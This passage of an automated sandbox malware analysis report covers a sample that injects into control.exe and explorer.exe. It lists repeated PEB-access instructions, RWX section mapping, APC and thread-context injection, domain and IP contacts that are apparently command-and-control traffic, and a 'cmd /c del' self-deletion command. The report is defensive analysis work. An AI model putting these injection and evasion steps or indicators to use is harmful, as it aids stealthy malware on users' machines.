          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04377D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04393D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04408DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04388E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04398EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04354F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04354F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04368794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04412073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04421074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04424015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04424015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04370050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04370050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04359100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04394A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04394A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0440B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04355210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04355210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04355210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04355210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04373A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04368A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0439927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0441AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0441AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0436AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0436AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0438FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0438D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0438D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04382AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04382ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04428B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04383B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04383B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0435DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0441131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0435F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0435DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0438B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04382397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04361B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04361B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0440D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0441138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_0437DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_04425BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 14_2_043D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00409B50 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Domain query: www.gooooooo.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.carriewilliamsinc.com
          Source: C:\Windows\explorer.exe | Network Connect: 148.72.244.75 80
          Source: C:\Windows\explorer.exe | Domain query: www.yixuan5.com
          Source: C:\Windows\explorer.exe | Domain query: www.inslidr.com
          Source: C:\Windows\explorer.exe | Domain query: www.farmacymerchants.com
          Source: C:\Windows\explorer.exe | Network Connect: 156.246.248.162 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: 840000
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: unknown protection: read write
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Memory written: C:\Users\user\Desktop\5tCYPTkM6b.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Thread register set: target process: 3292
          Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 3292
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Process created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: uProgram Manager
